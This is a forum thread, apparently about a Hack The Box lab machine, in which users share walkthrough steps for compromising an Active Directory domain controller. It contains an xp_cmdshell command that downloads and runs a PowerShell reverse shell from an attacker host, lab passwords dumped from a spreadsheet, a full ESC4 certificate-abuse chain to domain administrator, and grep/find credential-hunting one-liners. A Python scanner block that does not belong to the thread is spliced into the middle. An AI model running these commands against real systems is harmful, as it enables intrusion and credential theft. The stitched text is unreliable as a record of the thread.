Posts: 196
Threads: 31
Joined: Apr 2024
Jan 11, 2025, 10:58 PM
(This post was last modified: Jan 11, 2025, 10:59 PM by maggi.)
(Jan 11, 2025, 10:43 PM)Asdjkl01 Wrote: (Jan 11, 2025, 10:42 PM)userhere123 Wrote: (Jan 11, 2025, 10:14 PM)maggi Wrote: (Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at "mssqlclient.py", any tip??
enable xp cmdshell
use nishang (or whatever you come up with)
EXEC xp_cmdshell 'powershell -NoProfile -ExecutionPolicy Bypass -Command "& {IEX(New-Object Net.WebClient).DownloadString(''http://10.10.xx.xx:8000/Invoke-PowerShellTcp.ps1'')}"'
find creds for user
WINRM 10.129.69.181 5985 DC01 [+] sequel.htb\ryan:W****** (Pwn3d!)
Can't enable xp_cmdshell due to permission restrictions
You logged in as SA?
(Jan 11, 2025, 10:42 PM)StingEm Wrote: (Jan 11, 2025, 09:38 PM)Asdjkl01 Wrote: Any nudge for the config file? Could you share how you found it also, if not too much? I'm just struggling with enumeration.
For initial Foothold - once you log in as rose:
┌──(kali-admin㉿XXXPURPLEK)-[~/HTB/Escape2]
└─$ smbclient \\\\XX.XX.XX.XX/Accounting\ Department -U rose
Password for [WORKGROUP\rose]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Jun 9 06:52:21 2024
.. D 0 Sun Jun 9 06:52:21 2024
accounting_2024.xlsx A 10217 Sun Jun 9 06:14:49 2024
accounts.xlsx A 6780 Sun Jun 9 06:52:07 2024
6367231 blocks of size 4096. 888343 blocks available
smb: \> get accounts.xlsx
getting file \accounts.xlsx of size 6780 as accounts.xlsx (20.6 KiloBytes/sec) (average 20.6 KiloBytes/sec)
smb: \> get accounting_2024.xlsx '
getting file \accounting_2024.xlsx of size 10217 as ' (22.3 KiloBytes/sec) (average 21.6 KiloBytes/sec)
inside of those .xlsx you will find: [sharedStrings.xml]
<sst count="25" uniqueCount="24">
<si></si>
<si><t xml:space="preserve">Last Name</t></si>
<si><t xml:space="preserve">Email</t></si>
<si><t xml:space="preserve">Username</t></si>
<si><t xml:space="preserve">Password</t></si>
<si></si>
<si><t xml:space="preserve">Martin</t></si>
<si></si>
<si></si>
<si><t xml:space="preserve">0fwz7Q4mSpurIt99</t></si>
<si><t xml:space="preserve">Oscar</t></si>
<si><t xml:space="preserve">Martinez</t></si>
<si><t xml:space="preserve">oscar@sequel.htb</t></si>
<si><t xml:space="preserve">oscar</t></si>
<si><t xml:space="preserve">86LxLBMgEWaKUnBG</t></si>
<si><t xml:space="preserve">Kevin</t></si>
<si><t xml:space="preserve">Malone</t></si>
<si></si>
<si><t xml:space="preserve">kevin</t></si>
<si></si>
<si><t xml:space="preserve">NULL</t></si>
<si><t xml:space="preserve">sa@sequel.htb</t></si>
<si><t xml:space="preserve">sa</t></si>
<si><t xml:space="preserve">MSSQLP@ssw0rd!</t></si>
</sst>
That should get you going - at least I hope that is what you were asking
Thanks for the response! I'm actually looking for Ryan's creds right now. I can't seem to find the config file that contains his password. Any help with process would be appreciated too! Like tools that were used to find Ryan's password and such, since that is what I'm stuck on.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
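The dump quoted above is a plaintext credential table stored as shared strings in an .xlsx left on a file share. As a defender-side check for that condition, here is an added Python example (not from the thread) that opens a workbook, reads xl/sharedStrings.xml and flags a Password-style column header without echoing the cell values; the CREDENTIAL_HEADERS set and the constructed sample workbook are assumptions of this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# An .xlsx is a zip of XML parts; text cells live in xl/sharedStrings.xml under this namespace
SST_NS = "{http://schemas.openxmlformats.org/spreadsheetml/2006/main}"
# Column headers that mark a sheet as a credential list (heuristic set, an assumption here)
CREDENTIAL_HEADERS = {"password", "passwd", "pwd", "secret"}

def shared_strings(xlsx_bytes: bytes) -> list[str]:
    """Every <si> of xl/sharedStrings.xml in order, as plain text.
    Rich-text runs (<r><t>) are joined; an <si> without <t> yields ''."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "xl/sharedStrings.xml" not in zf.namelist():
            return []  # workbook has no text cells
        root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    return ["".join(t.text or "" for t in si.iter(f"{SST_NS}t"))
            for si in root.findall(f"{SST_NS}si")]

def credential_headers(strings: list[str]) -> list[str]:
    """Strings that look like a credential column header (case-insensitive)."""
    return [s for s in strings if s.strip().lower() in CREDENTIAL_HEADERS]

def scan_workbook(xlsx_bytes: bytes) -> dict:
    """Flag a workbook carrying a Password-style header. Only counts and headers
    are reported, never the cell values, so the report does not re-leak them."""
    strings = shared_strings(xlsx_bytes)
    hits = credential_headers(strings)
    return {"strings": len(strings), "credential_headers": hits, "flagged": bool(hits)}

def build_sample_xlsx() -> bytes:
    """Constructed minimal .xlsx (shared-strings part only) mirroring the layout
    quoted in the thread; the account values are placeholders, not the box's."""
    sst = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
           '<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" '
           'count="7" uniqueCount="7">'
           '<si><t xml:space="preserve">Email</t></si>'
           '<si><t xml:space="preserve">Username</t></si>'
           '<si><t xml:space="preserve">Password</t></si>'
           '<si></si>'  # empty entry, as in the quoted dump
           '<si><t xml:space="preserve">jdoe@example.test</t></si>'
           '<si><t xml:space="preserve">jdoe</t></si>'
           '<si><r><t>Placeholder-</t></r><r><t>Pass-123</t></r></si>'  # rich-text run
           '</sst>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", sst)
    return buf.getvalue()
```

Point scan_workbook() at each .xlsx pulled from a share review and treat flagged=True as a finding to follow up on.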
Posts: 5
Threads: 0
Joined: Oct 2024
(Jan 11, 2025, 10:55 PM)userhere123 Wrote: (Jan 11, 2025, 10:43 PM)Asdjkl01 Wrote: (Jan 11, 2025, 10:42 PM)userhere123 Wrote: (Jan 11, 2025, 10:14 PM)maggi Wrote: (Jan 11, 2025, 10:08 PM)userhere123 Wrote: Kinda stuck at "mssqlclient.py", any tip??
as Oscar
The admin password is at the end of the list of accounts. Use that one and you'll be able to get it working.
Posts: 14
Threads: 0
Joined: Nov 2024
(Jan 11, 2025, 10:47 PM)arrogantoverlord Wrote: could anyone help with privesc? for some reason it fails to request the cert, and it doesn't even come up as vulnerable (trying as ryan) 
any help on how you get ryan?
Posts: 5
Threads: 0
Joined: Jan 2025
How to log in as SA to enable xp_cmdshell?
Posts: 4
Threads: 0
Joined: Aug 2024
(Jan 11, 2025, 11:01 PM)Zer0Gr2vity Wrote: (Jan 11, 2025, 10:47 PM)arrogantoverlord Wrote: could anyone help with privesc? for some reason it fails to request the cert, and it doesn't even come up as vulnerable (trying as ryan) 
any help on how you get ryan?
Ryan's password is the same one found in the sql-Configuration.INI file.
Posts: 75
Threads: 5
Joined: Sep 2024
Jan 11, 2025, 11:33 PM
(This post was last modified: Jan 11, 2025, 11:34 PM by StingEm.)
Okay - I love the DMs - maybe it wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
FYI the password is the same as the sql_svc account's.
looks like flast94711 was a little faster - and 100% correct
Posts: 9
Threads: 0
Joined: Sep 2023
mssqlclient.py -p 1433 'sa'@dc01.sequel.htb -dc-ip {ip} (login with the password found in the unpacked Excel spreadsheet from the SMB share, as rose)
enable_xp_cmdshell
execute PowerShell #3 base64 reverse shell with your xp_cmdshell
find ryan's password in the SQL ini file on the box as sql_svc
login as ryan to get user.txt
ingest with BloodHound to find you have write-all on the ca_svc account, which lets you do the ESC4 attack as ryan
exploitation:
bloodyAD --host dc01.sequel.htb -d sequel.htb -u ryan -p {ryan_pass} set owner ca_svc ryan
dacledit.py -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/'ryan':'{ryan_pass}'
certipy-ad shadow auto -u ryan@sequel.htb -p '{ryan_pass}' -dc-ip {ip} -ns {ip} -target dc01.sequel.htb -account ca_svc
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip {ip} -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip {ip}
certipy-ad req -u ca_svc -hashes :{ca_svc_hash} -ca sequel-DC01-CA -target DC01.sequel.htb -dc-ip {ip} -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns {ip} -dns {ip}
certipy-ad auth -pfx ./administrator.pfx -dc-ip {ip}
evil-winrm -i dc01.sequel.htb -u administrator -H {admin_hash}
note: if you get some dumb shit DNS error it's because the automation reverted the template, so you need to redo the steps
Posts: 4
Threads: 0
Joined: Aug 2024
(Jan 11, 2025, 11:21 PM)userhere123 Wrote: How to log in as SA to enable xp_cmdshell?
Try running impacket's mssqlclient but only specify the user and the host/ip. It should then prompt you for the password.
Posts: 5
Threads: 0
Joined: Oct 2024
(Jan 11, 2025, 11:33 PM)StingEm Wrote: Okay - I love the DMs - maybe it wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
Thanks to both of you for the replies. I got it rooted, I was wondering how you came about finding that file. I know it's labeled obviously, but did you know about SQL configs beforehand and knew where to look? Thanks again!
Posts: 75
Threads: 5
Joined: Sep 2024
(Jan 12, 2025, 12:19 AM)Asdjkl01 Wrote: (Jan 11, 2025, 11:33 PM)StingEm Wrote: Okay - I love the DMs - maybe it wasn't posted: Ryan's creds are located inside the sql-Configuration.INI file.
Thanks to both of you for the replies. I got it rooted, I was wondering how you came about finding that file. I know it's labeled obviously, but did you know about SQL configs beforehand and knew where to look? Thanks again!
Happy to help - the key to pentesting is searching thru EVERYTHING - but eventually you will just see certain files like a config.ini, etc. and check 'em. It just takes time - it's better to be slow and thorough than to miss something and have to go back to it.
I will give you a trick of mine (many call it a time suck) but.. I have made a script that runs these for me:
grep -r -i -E "config|password|ini|passwd|pwd|hash|hashed|secret|key|token|credentials|auth|ssh|mysql|postgres|dbpass|db_password|dbuser|db_user" / 2>/dev/null
and
find / -type f \( -iname "*config*" -o -iname "*password*" -o -iname "*ini*" -o -iname "*passwd*" -o -iname "*pwd*" -o -iname "*hash*" -o -iname "*hashed*" -o -iname "*secret*" -o -iname "*key*" -o -iname "*token*" -o -iname "*credentials*" -o -iname "*auth*" -o -iname "*ssh*" -o -iname "*mysql*" -o -iname "*postgres*" -o -iname "*dbpass*" -o -iname "*db_password*" -o -iname "*dbuser*" -o -iname "*db_user*" -o -iname "*.conf" -o -iname "*.cfg" -o -iname "*.ini" -o -iname "*.env" -o -iname "*.properties" -o -iname "*.json" -o -iname "*.yaml" -o -iname "*.yml" -o -iname "*.xml" -o -iname "*.sh" -o -iname "*.py" -o -iname "*.php" \) 2>/dev/null
I have similar scripts to run via PowerShell, etc.
You may find them useful in the future; if so, enjoy!